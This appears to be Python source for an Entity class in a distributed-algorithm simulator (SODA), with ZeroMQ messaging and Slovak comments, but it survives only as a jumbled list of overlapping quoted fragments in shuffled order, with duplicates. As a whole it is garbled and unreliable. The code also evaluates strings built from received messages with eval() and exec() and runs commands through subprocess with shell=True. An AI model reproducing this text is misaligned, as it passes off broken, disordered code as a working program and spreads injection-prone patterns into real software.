_logger.info(\"Entity: {0} | Action: SEND |", "= \"%s = %s\" % (_output, _process_output) _self._actions[\"ASSIGN\"]((_expression,)) @support_arguments def add(_array, _value): _expression", "def execute(_command, _output_type, _output, _input): _command = split(_command) _input = _self._actions[\"EVALUATE\"](str(_input)) _process_output= None", "type(_n) is IfNode: _next_node = _n.execute(_self) if _next_node == \"BECOME\": break _n =", "nieje na poziícii premenná # uložíme si do premennej _result hodnotu True. Ak", "sú premennými dostali konkrétne hodnity. _message = _self._actions[\"EVALUATE\"](str(_message)) _recipients = _self._actions[\"EVALUATE\"](str(_recipients)) if type(_message)", "log, \"EVALUATE\": evaluate, \"EXEC\": execute, \"ADD\": add, \"REMOVE\": remove, \"POP\": pop } def", "= Context() _self._in_socket = _context.socket(DEALER) _self._in_socket.bind(\"tcp://*:%s\" % _self._in_port) _poller = Poller() _poller.register(_self._in_socket, POLLIN)", "konštrukcií pre # aktuálny stav. for _pattern in list(filter(lambda _p: _p != 'IMPULSE',", "{0} | Action: ASSIGN | Undefined identifier! -> {1} -> {2} \".format(_self._id, _Name,", "premennej. for _i, _j in zip(_pattern[1], _received_message): if type(_i) is tuple: _identifier, _", "do premennej _result hodnotu True. Ak sa hodnoty nezhodujú # a vo vzore", "# Pre uskutočnenie priradenia do nejakej premennej využívame funkciu exec(), # ktorá je", "_self._actions[\"EVALUATE\"](_expression)) def evaluate(_expression): result = None try: result = eval(_expression, {}, _self.__dict__) except", "# Iterujeme cez správanie. while _n is not None: # Vykonáme logiku uzlu.", "_self._read_lock = False # Nastavíme _n na prvý uzol správania príslušného pre aktuálny", "je tento nový stav terminujúci tak ukončíme správanie. if _self._state in _self._term_states: exit()", "_logger.info(\"Entity: {0} | Action: ASSIGN | Expression : {1} \".format(_self._id, _expression)) except NameError", "type of identifier! 
-> {1} -> {2} \".format(_self._id, _Type, _expression)) exit() @support_arguments def", "-> {2} \".format(_self._id, _Value,_expression)) exit() return result @support_arguments def execute(_command, _output_type, _output, _input):", "{}, _self.__dict__) _logger.info(\"Entity: {0} | Action: ASSIGN | Expression : {1} \".format(_self._id, _expression))", "a následne extrahujeme obsah správy a odosieľatela. _pickled_received_message = _self._in_socket.recv(flags=DONTWAIT) _received_message, _sender_entity_id =", "(_output, _array) _self._actions[\"ASSIGN\"]((_expression,)) _self._actions = { \"READ\": read, \"SEND\": send, \"BECOME\": become, \"ASSIGN\":", "value for output cast to int! -> {1} -> {2} \".format(_self._id, _Value, _completed_process.stdout))", "vzore nie je na pozícii premenná úložíme hodnotu False. Pre pozície # kde", "'IMPULSE' _logger.info(\"Entity: {0} | Action: Started by IMPULSE \".format(_self._id)) else: _self._read_lock = True", "False _self._read_lock = False _self._count_sent_messages = 0 _context = Context() _self._in_socket = _context.socket(DEALER)", "prišla správa. if _socks.get(_self._in_socket) == POLLIN: # Správu prečítame a následne extrahujeme obsah", "READ konštrukcií pre # aktuálny stav. for _pattern in list(filter(lambda _p: _p !=", "import deepcopy _logger = getLogger(__name__) class Entity(Thread): def __init__(_self, _id, _ip, _in_port, _state,", "# premenným entity, ktoré používateľ opísal v algoritme je nutné predať funkcii #", "pickle import dumps, loads from logging import getLogger from soda.helpers import support_arguments from", "soda.helpers import support_arguments from soda.distributed_environment.behavior import ActionNode, IfNode from subprocess import run, PIPE", "pozícii vo vzore a # prijatej správe tá istá hodnota a vo vzore", "= \"%s = %s\" % (_identifier, _j) # Využijeme akciu entity pre priradenie.", "{0} | Action: READ | Message : {1} | From entity : {2}", "je definovaný # reťazcom _expression. 
Aby mala funkcia exec() prístup ku všetkým lokálnym", "= [_n for _n in _neighbours] _self.__dict__['deepcopy'] = deepcopy _self.__dict__['LEN'] = len def", "prostredníctvom tretieho argumenty atribút objektu __dict__, v ktorom # sú uchované všetky aktuálne", "-> {1} -> {2} \".format(_self._id, _Type, _expression)) exit() @support_arguments def log(_expression): print(\"SODA: \"", "= _self._actions[\"EVALUATE\"](str(_recipients)) if type(_message) is not tuple: _message = (_message, ) # Ak", "output type if _output_type == 'string': _process_output = \"'\" + _completed_process.stdout + \"'\"", "to int! -> {1} -> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit() elif _output_type ==", "-> {1} -> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit() elif _output_type == 'float': try:", "value for output cast to float! -> {1} -> {2} \".format(_self._id, _Value, _completed_process.stdout))", "logging import getLogger from soda.helpers import support_arguments from soda.distributed_environment.behavior import ActionNode, IfNode from", "_ = _i if type(_j) is str: _j = \"'\" + _j +", "poslania správy. Zaznamenaný je identifikátor # odosielateľa, prijímateľa a samotná správa. _logger.info(\"Entity: {0}", "== 'float': try: _process_output = float(_completed_process.stdout) except ValueError as _Value: _logger.info( \"Entity: {0}", "not in _self._term_states: _current_state = _self._state # Entita sa spustí impulzom alebo začne", "type(_message) is not tuple: _message = (_message, ) # Ak je prijímateľ iba", ") # Ak je prijímateľ iba jeden pretypujeme ho na pole. if type(_recipients)", "správe do tejto premennej. for _i, _j in zip(_pattern[1], _received_message): if type(_i) is", "To entity : {2} \".format(_self._id, _message, _n)) _self._count_sent_messages += 1 except KeyError: #", "so vzorom. Ak je na rovnakej pozícii vo vzore a # prijatej správe", "vo vzore a # prijatej správe tá istá hodnota a vo vzore nieje", "vzorom. 
if False not in _result: # Pre pozície kde je vo vzore", "prijímateľ iba jeden pretypujeme ho na pole. if type(_recipients) is int: _recipients =", "prijímateľa a samotná správa. _logger.info(\"Entity: {0} | Action: SEND | Message : {1}", "from logging import getLogger from soda.helpers import support_arguments from soda.distributed_environment.behavior import ActionNode, IfNode", "== len(_received_message): for _i, _j in zip(_pattern[1], _received_message): if _i == _j and", "EVALUATE | Wrong type of identifier! -> {1} -> {2} \".format(_self._id, _Attribute, _expression))", "cast to int! -> {1} -> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit() elif _output_type", "uložíme hodnotu None. if len(_pattern[1]) == len(_received_message): for _i, _j in zip(_pattern[1], _received_message):", "Action: ASSIGN | Wrong type of identifier! -> {1} -> {2} \".format(_self._id, _Attribute,", "že prijatá správa # sa zhoduje so vzorom. if False not in _result:", "in list(filter(lambda _p: _p != 'IMPULSE', _self._states_behaviors[_self._state])): _result = [] # Porovnáme správu", "execute(_command, _output_type, _output, _input): _command = split(_command) _input = _self._actions[\"EVALUATE\"](str(_input)) _process_output= None _completed_process", "is IfNode: _next_node = _n.execute(_self) if _next_node == \"BECOME\": break _n = _next_node", "is not tuple: _result.append(True) elif _i != _j and type(_i) is not tuple:", "!= _j and type(_i) is not tuple: _result.append(False) else: _result.append(None) # Ak v", "_self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def remove(_array, _value): _expression = \"%s.remove(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments", "_current_state = _self._state # Entita sa spustí impulzom alebo začne čítať prijaté správy.", "identifier! -> {1} -> {2} \".format(_self._id, _Name, _expression)) exit() except AttributeError as _Attribute:", "uzlu. 
Logika uzlov je opísaná # v podkapitole 4.2.3 Správanie. if type(_n) is", "príslušnej # pozície v správe do tejto premennej. for _i, _j in zip(_pattern[1],", "nie je na pozícii premenná úložíme hodnotu False. Pre pozície # kde je", "= _sender_entity_id _logger.info(\"Entity: {0} | Action: READ | Message : {1} | From", "from shlex import split from copy import deepcopy _logger = getLogger(__name__) class Entity(Thread):", "vo vzore premenná si uložíme hodnotu None. if len(_pattern[1]) == len(_received_message): for _i,", "for _n in _neighbours] _self.__dict__['deepcopy'] = deepcopy _self.__dict__['LEN'] = len def read(): #", "threading import Thread from pickle import dumps, loads from logging import getLogger from", "soket prišla správa. while True: _socks = dict(_poller.poll()) # Ak prišla správa. if", "exit() _expression = \"%s = %s\" % (_output, _process_output) _self._actions[\"ASSIGN\"]((_expression,)) @support_arguments def add(_array,", "ASSIGN | Expression : {1} \".format(_self._id, _expression)) except NameError as _Name: _logger.info(\"Entity: {0}", "= %s\" % (_output, _process_output) _self._actions[\"ASSIGN\"]((_expression,)) @support_arguments def add(_array, _value): _expression = \"%s.append(%s)\"", "%s.pop()\" % (_output, _array) _self._actions[\"ASSIGN\"]((_expression,)) _self._actions = { \"READ\": read, \"SEND\": send, \"BECOME\":", "= False _behavior = 'IMPULSE' _logger.info(\"Entity: {0} | Action: Started by IMPULSE \".format(_self._id))", "class Entity(Thread): def __init__(_self, _id, _ip, _in_port, _state, _term_states, _states_behaviors, _neighbours): Thread.__init__(_self) _self._id", "{2} \".format(_self._id, _self._state, _new_state)) # Entita zmení svoj stav na nový. 
_self._state =", "-> {2} \".format(_self._id, _Type, _expression)) exit() @support_arguments def log(_expression): print(\"SODA: \" + _self._actions[\"EVALUATE\"](_expression))", "except NameError as _Name: _logger.info(\"Entity: {0} | Action: EVALUATE | Undefined identifier! ->", "# prijatej správe tá istá hodnota a vo vzore nieje na poziícii premenná", "else: _result.append(None) # Ak v v poli _result nie je hodnota False znamená", "| Action: ASSIGN | Undefined identifier! -> {1} -> {2} \".format(_self._id, _Name, _expression))", "ValueError as _Value: _logger.info( \"Entity: {0} | Action: EXEC | Wrong value for", "hodnotu True. Ak sa hodnoty nezhodujú # a vo vzore nie je na", "_self._actions[\"READ\"]() _self._read_lock = False # Nastavíme _n na prvý uzol správania príslušného pre", "{0} | Action: SEND | Trying to send message to non existing neighbour!", "_pattern in list(filter(lambda _p: _p != 'IMPULSE', _self._states_behaviors[_self._state])): _result = [] # Porovnáme", "{}, _self.__dict__) except NameError as _Name: _logger.info(\"Entity: {0} | Action: EVALUATE | Undefined", "| Message : {1} | From entity : {2} \".format(_self._id, _received_message, _sender_entity_id)) #", "from copy import deepcopy _logger = getLogger(__name__) class Entity(Thread): def __init__(_self, _id, _ip,", "vzor, ktorý sa zhodoval so správou, ktorú sme # prijali aby sme mohli", "o 1. for _n in _recipients: try: _out_socket = _context.socket(DEALER) _out_socket.connect(\"tcp://localhost:%s\" % _self._neighbours[_n][\"in_port\"])", "| Wrong type of identifier! -> {1} -> {2} \".format(_self._id, _Type, _expression)) exit()", "POLLIN) _self.i_ID = int(_id) _self.i_NEIGHBOURS = [_n for _n in _neighbours] _self.__dict__['deepcopy'] =", "kde je vo vzore premenná uložíme hodnotu z príslušnej # pozície v správe", "_behavior = 'IMPULSE' _logger.info(\"Entity: {0} | Action: Started by IMPULSE \".format(_self._id)) else: _self._read_lock", "nový soket typu DEALER [18]. 
Následne # odošleme správu spolu s identifikátorom odosieľatela", "and type(_i) is not tuple: _result.append(False) else: _result.append(None) # Ak v v poli", "_in_port _self._state = _state _self._term_states = _term_states _self._states_behaviors = _states_behaviors _self._neighbours = _neighbours", "exec vykonať je definovaný # reťazcom _expression. Aby mala funkcia exec() prístup ku", "Old state : {1} | New state : {2} \".format(_self._id, _self._state, _new_state)) #", "(_message, _self._id) _pickled_message = dumps(_message_content) _out_socket.send(_pickled_message, flags=DONTWAIT) # Zalogovanie úspešného poslania správy. Zaznamenaný", "\"BECOME\": become, \"ASSIGN\": assign, \"LOG\": log, \"EVALUATE\": evaluate, \"EXEC\": execute, \"ADD\": add, \"REMOVE\":", "= eval(_expression, {}, _self.__dict__) except NameError as _Name: _logger.info(\"Entity: {0} | Action: EVALUATE", "_self._states_behaviors = _states_behaviors _self._neighbours = _neighbours _self._impulse = False _self._read_lock = False _self._count_sent_messages", "zmq import Context, DONTWAIT, Poller, POLLIN, DEALER from threading import Thread from pickle", "nedostane do terminujúceho stavu. while _self._state not in _self._term_states: _current_state = _self._state #", "je vo vzore premenná si uložíme hodnotu None. if len(_pattern[1]) == len(_received_message): for", "Message : {1} | From entity : {2} \".format(_self._id, _received_message, _sender_entity_id)) # Nakoniec", "in _recipients: try: _out_socket = _context.socket(DEALER) _out_socket.connect(\"tcp://localhost:%s\" % _self._neighbours[_n][\"in_port\"]) _message_content = (_message, _self._id)", "kde je vo vzore premenná si uložíme hodnotu None. 
if len(_pattern[1]) == len(_received_message):", "= { \"READ\": read, \"SEND\": send, \"BECOME\": become, \"ASSIGN\": assign, \"LOG\": log, \"EVALUATE\":", "_self._impulse = False _behavior = 'IMPULSE' _logger.info(\"Entity: {0} | Action: Started by IMPULSE", "Started by IMPULSE \".format(_self._id)) else: _self._read_lock = True _behavior = _self._actions[\"READ\"]() _self._read_lock =", "% _self._in_port) _poller = Poller() _poller.register(_self._in_socket, POLLIN) _self.i_ID = int(_id) _self.i_NEIGHBOURS = [_n", "\".format(_self._id, _Value, _completed_process.stdout)) exit() elif _output_type == 'float': try: _process_output = float(_completed_process.stdout) except", "@support_arguments def log(_expression): print(\"SODA: \" + _self._actions[\"EVALUATE\"](_expression)) def evaluate(_expression): result = None try:", "Nastavíme _n na prvý uzol správania príslušného pre aktuálny stav. _n = _self._states_behaviors[_current_state][_behavior].head", "_self.__dict__['LEN'] = len def read(): # V nekonečnom cykle sledujeme, či na soket", "not tuple: _message = (_message, ) # Ak je prijímateľ iba jeden pretypujeme", "_Attribute, _expression)) exit() except ValueError as _Value: _logger.info(\"Entity: {0} | Action: EVALUATE |", "Entity(Thread): def __init__(_self, _id, _ip, _in_port, _state, _term_states, _states_behaviors, _neighbours): Thread.__init__(_self) _self._id =", "print(\"SODA: \" + _self._actions[\"EVALUATE\"](_expression)) def evaluate(_expression): result = None try: result = eval(_expression,", "_new_state # Ak je tento nový stav terminujúci tak ukončíme správanie. if _self._state", "len(_pattern[1]) == len(_received_message): for _i, _j in zip(_pattern[1], _received_message): if _i == _j", "_sender_entity_id)) # Nakoniec vrátime vzor, ktorý sa zhodoval so správou, ktorú sme #", "Nakoniec vrátime vzor, ktorý sa zhodoval so správou, ktorú sme # prijali aby", "do použitelnej premennej. 
_self.i_SENDER = _sender_entity_id _logger.info(\"Entity: {0} | Action: READ | Message", "exec() prístup ku všetkým lokálnym # premenným entity, ktoré používateľ opísal v algoritme", "= \"%s = %s.pop()\" % (_output, _array) _self._actions[\"ASSIGN\"]((_expression,)) _self._actions = { \"READ\": read,", ": {1} | New state : {2} \".format(_self._id, _self._state, _new_state)) # Entita zmení", "EVALUATE | Undefined identifier! -> {1} -> {2} \".format(_self._id, _Name, _expression)) exit() except", "is ActionNode: _next_node = _n.execute(_self) elif type(_n) is IfNode: _next_node = _n.execute(_self) if", "Message : {1} | To entity : {2} \".format(_self._id, _message, _n)) _self._count_sent_messages +=", "= 0 _context = Context() _self._in_socket = _context.socket(DEALER) _self._in_socket.bind(\"tcp://*:%s\" % _self._in_port) _poller =", "Action: EVALUATE | Wrong value! -> {1} -> {2} \".format(_self._id, _Value,_expression)) exit() return", "split(_command) _input = _self._actions[\"EVALUATE\"](str(_input)) _process_output= None _completed_process = run(_command, input=str(_input), stdout=PIPE, universal_newlines=True, shell=True)", "int! -> {1} -> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit() elif _output_type == 'float':", "_self._state = _new_state # Ak je tento nový stav terminujúci tak ukončíme správanie.", "jeden pretypujeme ho na pole. if type(_recipients) is int: _recipients = [_recipients] *", "dostali konkrétne hodnity. _message = _self._actions[\"EVALUATE\"](str(_message)) _recipients = _self._actions[\"EVALUATE\"](str(_recipients)) if type(_message) is not", "_expression = \"%s = %s\" % (_output, _process_output) _self._actions[\"ASSIGN\"]((_expression,)) @support_arguments def add(_array, _value):", "Thread.__init__(_self) _self._id = _id _self._ip = _ip _self._in_port = _in_port _self._state = _state", "napríklad v prípade # argumentov, ktoré sú premennými dostali konkrétne hodnity. _message =", "cast to float! 
-> {1} -> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit() _expression =", "if type(_i) is tuple: _identifier, _ = _i if type(_j) is str: _j", "= _context.socket(DEALER) _out_socket.connect(\"tcp://localhost:%s\" % _self._neighbours[_n][\"in_port\"]) _message_content = (_message, _self._id) _pickled_message = dumps(_message_content) _out_socket.send(_pickled_message,", "from soda.helpers import support_arguments from soda.distributed_environment.behavior import ActionNode, IfNode from subprocess import run,", "output cast to int! -> {1} -> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit() elif", "ku všetkým lokálnym # premenným entity, ktoré používateľ opísal v algoritme je nutné", "_self.__dict__['deepcopy'] = deepcopy _self.__dict__['LEN'] = len def read(): # V nekonečnom cykle sledujeme,", "return _pattern @support_arguments def send(_message, _recipients): # Vykonáme evaluáciu správy a prijímateľov aby", "_pickled_received_message = _self._in_socket.recv(flags=DONTWAIT) _received_message, _sender_entity_id = loads(_pickled_received_message) _logger.info(\"Entity: {0} | Action: RECEIVED |", "je na rovnakej pozícii vo vzore a # prijatej správe tá istá hodnota", "type(_i) is not tuple: _result.append(True) elif _i != _j and type(_i) is not", "KeyError: # Zalogovanie neúspešného odoslania správy. _logger.info(\"Entity: {0} | Action: SEND | Trying", "do nejakej premennej využívame funkciu exec(), # ktorá je jednou zo vstavaných funkcií", "result @support_arguments def execute(_command, _output_type, _output, _input): _command = split(_command) _input = _self._actions[\"EVALUATE\"](str(_input))", "v podkapitole 4.2.3 Správanie. 
if type(_n) is ActionNode: _next_node = _n.execute(_self) elif type(_n)", "= 'IMPULSE' _logger.info(\"Entity: {0} | Action: Started by IMPULSE \".format(_self._id)) else: _self._read_lock =", "_next_node = _n.execute(_self) elif type(_n) is IfNode: _next_node = _n.execute(_self) if _next_node ==", "_self._read_lock = True _behavior = _self._actions[\"READ\"]() _self._read_lock = False # Nastavíme _n na", "uložíme si do premennej _result hodnotu True. Ak sa hodnoty nezhodujú # a", "_next_node = None # Iterujeme cez správanie. while _n is not None: #", "str: _j = \"'\" + _j + \"'\" _expression = \"%s = %s\"", "_self.i_SENDER = _sender_entity_id _logger.info(\"Entity: {0} | Action: READ | Message : {1} |", "_in_port, _state, _term_states, _states_behaviors, _neighbours): Thread.__init__(_self) _self._id = _id _self._ip = _ip _self._in_port", "\".format(_self._id, _self._state, _new_state)) # Entita zmení svoj stav na nový. _self._state = _new_state", "pop(_array, _output): _expression = \"%s = %s.pop()\" % (_output, _array) _self._actions[\"ASSIGN\"]((_expression,)) _self._actions =", "neighbour! -> {1} \".format(_self._id, _n)) @support_arguments def become(_new_state): _logger.info(\"Entity: {0} | Action: BECOME", "Wrong type of identifier! -> {1} -> {2} \".format(_self._id, _Type, _expression)) exit() @support_arguments", "copy import deepcopy _logger = getLogger(__name__) class Entity(Thread): def __init__(_self, _id, _ip, _in_port,", "začne čítať prijaté správy. if _self._impulse: _self._impulse = False _behavior = 'IMPULSE' _logger.info(\"Entity:", "mala funkcia exec() prístup ku všetkým lokálnym # premenným entity, ktoré používateľ opísal", "do tejto premennej. for _i, _j in zip(_pattern[1], _received_message): if type(_i) is tuple:", "nie je hodnota False znamená to, že prijatá správa # sa zhoduje so", "non existing neighbour! 
-> {1} \".format(_self._id, _n)) @support_arguments def become(_new_state): _logger.info(\"Entity: {0} |", "From entity : {2} \".format(_self._id, _received_message, _sender_entity_id)) # Porovnámme prijatú správu so všetkými", "príslušného pre aktuálny stav. _n = _self._states_behaviors[_current_state][_behavior].head _next_node = None # Iterujeme cez", "v poli _result nie je hodnota False znamená to, že prijatá správa #", "_result: # Pre pozície kde je vo vzore premenná uložíme hodnotu z príslušnej", "= True _behavior = _self._actions[\"READ\"]() _self._read_lock = False # Nastavíme _n na prvý", "_self._count_sent_messages = 0 _context = Context() _self._in_socket = _context.socket(DEALER) _self._in_socket.bind(\"tcp://*:%s\" % _self._in_port) _poller", "= dict(_poller.poll()) # Ak prišla správa. if _socks.get(_self._in_socket) == POLLIN: # Správu prečítame", "from zmq import Context, DONTWAIT, Poller, POLLIN, DEALER from threading import Thread from", "{0} | Action: EVALUATE | Undefined identifier! -> {1} -> {2} \".format(_self._id, _Name,", "= None try: result = eval(_expression, {}, _self.__dict__) except NameError as _Name: _logger.info(\"Entity:", "exit() elif _output_type == 'float': try: _process_output = float(_completed_process.stdout) except ValueError as _Value:", "from soda.distributed_environment.behavior import ActionNode, IfNode from subprocess import run, PIPE from shlex import", "getLogger(__name__) class Entity(Thread): def __init__(_self, _id, _ip, _in_port, _state, _term_states, _states_behaviors, _neighbours): Thread.__init__(_self)", "_term_states _self._states_behaviors = _states_behaviors _self._neighbours = _neighbours _self._impulse = False _self._read_lock = False", "_n na prvý uzol správania príslušného pre aktuálny stav. 
_n = _self._states_behaviors[_current_state][_behavior].head _next_node", "premenným entity, ktoré používateľ opísal v algoritme je nutné predať funkcii # exec()", "_expression)) exit() except TypeError as _Type: _logger.info(\"Entity: {0} | Action: ASSIGN | Wrong", "_result nie je hodnota False znamená to, že prijatá správa # sa zhoduje", "\"'\" + _j + \"'\" _expression = \"%s = %s\" % (_identifier, _j)", "except NameError as _Name: _logger.info(\"Entity: {0} | Action: ASSIGN | Undefined identifier! ->", "_n.execute(_self) elif type(_n) is IfNode: _next_node = _n.execute(_self) if _next_node == \"BECOME\": break", "== _j and type(_i) is not tuple: _result.append(True) elif _i != _j and", "referencie premenných a ich hodnôt. try: exec(_expression, {}, _self.__dict__) _logger.info(\"Entity: {0} | Action:", "Action: READ | Message : {1} | From entity : {2} \".format(_self._id, _received_message,", "dumps(_message_content) _out_socket.send(_pickled_message, flags=DONTWAIT) # Zalogovanie úspešného poslania správy. Zaznamenaný je identifikátor # odosielateľa,", "počet # odoslaných správ pre entitu o 1. for _n in _recipients: try:", "split from copy import deepcopy _logger = getLogger(__name__) class Entity(Thread): def __init__(_self, _id,", "Python príkaz. Príkaz, ktorý ma exec vykonať je definovaný # reťazcom _expression. Aby", "nový. _self._state = _new_state # Ak je tento nový stav terminujúci tak ukončíme", "| Trying to send message to non existing neighbour! -> {1} \".format(_self._id, _n))", "_received_message, _sender_entity_id)) # Porovnámme prijatú správu so všetkými vzormi READ konštrukcií pre #", "| Action: ASSIGN | Expression : {1} \".format(_self._id, _expression)) except NameError as _Name:", "_process_output= None _completed_process = run(_command, input=str(_input), stdout=PIPE, universal_newlines=True, shell=True) # cast to correct", "float! 
-> {1} -> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit() _expression = \"%s =", "_Type, _expression)) exit() @support_arguments def log(_expression): print(\"SODA: \" + _self._actions[\"EVALUATE\"](_expression)) def evaluate(_expression): result", "not in _result: # Pre pozície kde je vo vzore premenná uložíme hodnotu", "Action: EXEC | Wrong value for output cast to float! -> {1} ->", "= _self._states_behaviors[_current_state][_behavior].head _next_node = None # Iterujeme cez správanie. while _n is not", "# Entita zmení svoj stav na nový. _self._state = _new_state # Ak je", "to, že prijatá správa # sa zhoduje so vzorom. if False not in", "_j) # Využijeme akciu entity pre priradenie. _self._actions[\"ASSIGN\"]((_expression, )) # Uložíme odosieľatela do", "premenná uložíme hodnotu z príslušnej # pozície v správe do tejto premennej. for", "_completed_process.stdout)) exit() elif _output_type == 'float': try: _process_output = float(_completed_process.stdout) except ValueError as", "POLLIN: # Správu prečítame a následne extrahujeme obsah správy a odosieľatela. _pickled_received_message =", "from subprocess import run, PIPE from shlex import split from copy import deepcopy", "\"ASSIGN\": assign, \"LOG\": log, \"EVALUATE\": evaluate, \"EXEC\": execute, \"ADD\": add, \"REMOVE\": remove, \"POP\":", "\"ADD\": add, \"REMOVE\": remove, \"POP\": pop } def run(_self): # Entita vykonáva správanie", "shlex import split from copy import deepcopy _logger = getLogger(__name__) class Entity(Thread): def", "Action: RECEIVED | Message : {1} | From entity : {2} \".format(_self._id, _received_message,", "NameError as _Name: _logger.info(\"Entity: {0} | Action: ASSIGN | Undefined identifier! -> {1}", "# v podkapitole 4.2.3 Správanie. if type(_n) is ActionNode: _next_node = _n.execute(_self) elif", "pozície v správe do tejto premennej. for _i, _j in zip(_pattern[1], _received_message): if", "je jednou zo vstavaných funkcií jazyka Python. 
Exec() dokáže vykonať # akýkolvek valídny", "_self._impulse: _self._impulse = False _behavior = 'IMPULSE' _logger.info(\"Entity: {0} | Action: Started by", "shell=True) # cast to correct output type if _output_type == 'string': _process_output =", "_array) _self._actions[\"ASSIGN\"]((_expression,)) _self._actions = { \"READ\": read, \"SEND\": send, \"BECOME\": become, \"ASSIGN\": assign,", "(_message, ) # Ak je prijímateľ iba jeden pretypujeme ho na pole. if", "\"POP\": pop } def run(_self): # Entita vykonáva správanie pokiaľ sa nedostane do", "if _output_type == 'string': _process_output = \"'\" + _completed_process.stdout + \"'\" elif _output_type", "_value): _expression = \"%s.append(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def remove(_array, _value): _expression", "= False # Nastavíme _n na prvý uzol správania príslušného pre aktuálny stav.", "exit() @support_arguments def assign(_expression): # Pre uskutočnenie priradenia do nejakej premennej využívame funkciu", "try: _process_output = float(_completed_process.stdout) except ValueError as _Value: _logger.info( \"Entity: {0} | Action:", "is not tuple: _result.append(False) else: _result.append(None) # Ak v v poli _result nie", "= float(_completed_process.stdout) except ValueError as _Value: _logger.info( \"Entity: {0} | Action: EXEC |", "\"READ\": read, \"SEND\": send, \"BECOME\": become, \"ASSIGN\": assign, \"LOG\": log, \"EVALUATE\": evaluate, \"EXEC\":", "= int(_completed_process.stdout) except ValueError as _Value: _logger.info( \"Entity: {0} | Action: EXEC |", "\".format(_self._id, _Attribute, _expression)) exit() except TypeError as _Type: _logger.info(\"Entity: {0} | Action: ASSIGN", "_result hodnotu True. 
Ak sa hodnoty nezhodujú # a vo vzore nie je", "_i, _j in zip(_pattern[1], _received_message): if type(_i) is tuple: _identifier, _ = _i", "_received_message): if type(_i) is tuple: _identifier, _ = _i if type(_j) is str:", "{0} | Action: SEND | Message : {1} | To entity : {2}", "na pozícii premenná úložíme hodnotu False. Pre pozície # kde je vo vzore", "Využijeme akciu entity pre priradenie. _self._actions[\"ASSIGN\"]((_expression, )) # Uložíme odosieľatela do použitelnej premennej.", "so všetkými vzormi READ konštrukcií pre # aktuálny stav. for _pattern in list(filter(lambda", "správ pre entitu o 1. for _n in _recipients: try: _out_socket = _context.socket(DEALER)", "_n)) _self._count_sent_messages += 1 except KeyError: # Zalogovanie neúspešného odoslania správy. _logger.info(\"Entity: {0}", "{2} \".format(_self._id, _message, _n)) _self._count_sent_messages += 1 except KeyError: # Zalogovanie neúspešného odoslania", "except KeyError: # Zalogovanie neúspešného odoslania správy. _logger.info(\"Entity: {0} | Action: SEND |", "read(): # V nekonečnom cykle sledujeme, či na soket prišla správa. while True:", "\"%s = %s\" % (_identifier, _j) # Využijeme akciu entity pre priradenie. _self._actions[\"ASSIGN\"]((_expression,", "ASSIGN | Undefined identifier! -> {1} -> {2} \".format(_self._id, _Name, _expression)) exit() except", "_value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def pop(_array, _output): _expression = \"%s = %s.pop()\" % (_output,", "evaluáciu správy a prijímateľov aby sme napríklad v prípade # argumentov, ktoré sú", "zo vstavaných funkcií jazyka Python. Exec() dokáže vykonať # akýkolvek valídny Python príkaz.", "None # Iterujeme cez správanie. while _n is not None: # Vykonáme logiku", "Action: ASSIGN | Expression : {1} \".format(_self._id, _expression)) except NameError as _Name: _logger.info(\"Entity:", "= None # Iterujeme cez správanie. while _n is not None: # Vykonáme", "správu so vzorom. 
Ak je na rovnakej pozícii vo vzore a # prijatej", "pozície kde je vo vzore premenná uložíme hodnotu z príslušnej # pozície v", "správy a prijímateľov aby sme napríklad v prípade # argumentov, ktoré sú premennými", "_logger.info(\"Entity: {0} | Action: SEND | Message : {1} | To entity :", "import ActionNode, IfNode from subprocess import run, PIPE from shlex import split from", "_result.append(True) elif _i != _j and type(_i) is not tuple: _result.append(False) else: _result.append(None)", "_message = _self._actions[\"EVALUATE\"](str(_message)) _recipients = _self._actions[\"EVALUATE\"](str(_recipients)) if type(_message) is not tuple: _message =", "vykonať # akýkolvek valídny Python príkaz. Príkaz, ktorý ma exec vykonať je definovaný", "# reťazcom _expression. Aby mala funkcia exec() prístup ku všetkým lokálnym # premenným", "Ak v v poli _result nie je hodnota False znamená to, že prijatá", "assign(_expression): # Pre uskutočnenie priradenia do nejakej premennej využívame funkciu exec(), # ktorá", "-> {1} -> {2} \".format(_self._id, _Name, _expression)) exit() except AttributeError as _Attribute: _logger.info(\"Entity:", "exit() @support_arguments def log(_expression): print(\"SODA: \" + _self._actions[\"EVALUATE\"](_expression)) def evaluate(_expression): result = None", "(_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def remove(_array, _value): _expression = \"%s.remove(%s)\" % (_array, _value)", "ktorý sa zhodoval so správou, ktorú sme # prijali aby sme mohli následne", "# odošleme správu spolu s identifikátorom odosieľatela a zvýšíme počet # odoslaných správ", "hodnôt. try: exec(_expression, {}, _self.__dict__) _logger.info(\"Entity: {0} | Action: ASSIGN | Expression :", "Action: SEND | Message : {1} | To entity : {2} \".format(_self._id, _message,", "_expression)) except NameError as _Name: _logger.info(\"Entity: {0} | Action: ASSIGN | Undefined identifier!", "identifier! 
-> {1} -> {2} \".format(_self._id, _Type, _expression)) exit() @support_arguments def log(_expression): print(\"SODA:", "_self._in_port = _in_port _self._state = _state _self._term_states = _term_states _self._states_behaviors = _states_behaviors _self._neighbours", "sledujeme, či na soket prišla správa. while True: _socks = dict(_poller.poll()) # Ak", "# Pre pozície kde je vo vzore premenná uložíme hodnotu z príslušnej #", "_logger.info(\"Entity: {0} | Action: BECOME | Old state : {1} | New state", "[_recipients] * 1 # Pre každého prijímateľa vytvoríme nový soket typu DEALER [18].", "Action: EVALUATE | Undefined identifier! -> {1} -> {2} \".format(_self._id, _Name, _expression)) exit()", "\"Entity: {0} | Action: EXEC | Wrong value for output cast to int!", "for output cast to int! -> {1} -> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit()", "{1} -> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit() _expression = \"%s = %s\" %", "_value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def remove(_array, _value): _expression = \"%s.remove(%s)\" % (_array, _value) 